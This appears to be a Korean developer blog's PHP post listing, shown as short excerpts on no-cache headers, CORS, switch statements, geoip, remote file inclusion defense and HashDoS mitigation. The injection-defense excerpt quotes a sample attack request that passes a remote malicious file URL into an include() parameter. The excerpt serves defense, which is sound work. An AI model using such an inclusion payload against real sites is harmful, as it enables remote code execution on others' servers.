개발자의 끄적끄적

[php] no cache 설정 / 뒤로가기 막기 프로젝트를 진행하다 보면 로그아웃을 하여 세션을 제거한 후에 뒤로 가기 버튼을 누르면 로그인이 되어 있는 이전 사이트로 이동되는 경우가 있습니다. 이럴때 php 에서 head 부분 최상단에 위 코드를 추가하면 됩니다. 참고들 하세요!!

[PHP no-cache 설정(뒤로 버튼을 누르면 만료된 페이지 띄우기) [PHP no-cache 설정(뒤로 버튼을 누르면 만료된 페이지 띄우기) 페이지의 구성이 아래와 같이 구성되어 있다고 가정하겠습니다. coupon _form.php -> coupon_update.php -> coupon_result.php 첫번째 페이지인 coupon_form.php 는 쿠폰의 정보를 입력하는 페이지입니다. 쿠폰 정보입력이 완료되면 두번째 페이지인 copon_update.php 로 전송되어져 정보가 데이타베이스에 저장되고 쿠폰에 대한 댓가로 경품이 지급됩니다. 물론 경품지급도 데이타베이스 상에서 하나의 결과 값으로 처리될 것입니다. 경품지급이 사용자에게 성공적으로 이루어 지게 되면 coupon _result.php로..

[php] CROSS DOMAIN 대응 방법 CROSS DOMAIN ISSUE 는 JS의 정책에 따라 AJAX등을 이용하여 다른 도메인에 접속을 시도하려는 경우 보안 문제로 간주하고 차단함에 의해 발생한다. 이를 해결하기 위해선 다른 도메인에서 오는 접속에 대해 허용을 해주어야 한다. * response.setHeader("Access-Control-Allow-Methods", "POST, GET, OPTIONS, DELETE"); - POST, GET, OPTIONS, DELETE 에 대해 요청을 허가. * response.setHeader("Access-Control-Max-Age", "3600"); - HTTP Request 가 발생할 때 preflight request라는 요청이 발생. prefl..

[PHP] 강좌 #12 조건문 switch case문 The PHP switch Statement if문으로 모든 것을 다 표현할 수 있습니다만, swtich case 문은 if문을 좀 더 편리하게 사용하기 위해 고안된 것입니다. 약간 특별한 형태의 if문이라고 볼 수 있습니다. switch case문 [문법] switch (n) { case label1: code to be executed if n=label1; break; case label2: code to be executed if n=label2; break; case label3: code to be executed if n=label3; break; ... default: code to be executed if n is different ..

[php/codeigniter] geoip library [펌] 잘정리되어 있는 geoip 라이브러리가 있어서 참고용으로 퍼왔습니다!! 개발하실때 참고들 하세요!! 출처는 아래 명시했습니다! Geolocalization IP Online Geolocalizacion mediante ip, utilizando la api de http://www.ipinfodb.com/, de manera online, sin base de datos locales. Sencilla libreria para el framework de php Codeigniter 3.0. Simple library for CodeIgniter framework 3.0 to locate ip by online without locals d..

[php] 현재 url 확인 HTTP_HOST: REQUEST_URI: URL:

[PHP]인젝션 공격 방어 대책 최근에 간간이 발생되는 취약점 중 하나가 php injection입니다. 로그를 보시면 이런식으로 공격이 들어가죠.. local/test.php?param=http://malicious_text/hack.txt PHP 프로그래밍 중 주의해야 할 것이 바로 PHP Injection 취약점입니다. 대한민국의 많은 게시판 및 웹 솔루션들이 바로 이 취약점에 무력화됩니다. 원격지의 파일을 로컬의 파일처럼 실행하는데 문제가 있습니다. 아래와 같이 코딩을 하게되면 param값으로 들어온 내용을 include()함수가 실행하여 처리하게 됩니다. 그런데 여기서 param값으로 전달되는 내용이 내부파일인지 외부파일인지를 설정에 따라 실행하게 됩니다. ( php.ini 설정에서 allow_..

[php] php에서 hash table DoS(HashDoS) 공격 방어 [펌] 웹서버에서는 Request POST, GET 변수를 hash 구조로 관리한다. 그런데 POST 요청 파라미터수가 상당히 많을 경우(GET 요청은 길이 제한이 있으므로 문제가 되지 않음)에 hash 충돌이 많이 발생하게 되어 CPU load가 상당히 올라가게 된다. 이런 문제는 PHP5, Asp.Net, Java, V8 자바스크립트 엔진 등에서 발생한다. 취약점을 해결하거나 공격을 약화시키는 방법이다. 1. php 5.4.0 RC버전과 앞으로 나올 PHP 5.3.9 버전 (취약점 해결) max_input_vars 설정으로 파라미터 개수를 제한한다. 2. 기존 php버전에서 (완벽한 해결이 아닌 공격을 약화시키는 방법) php..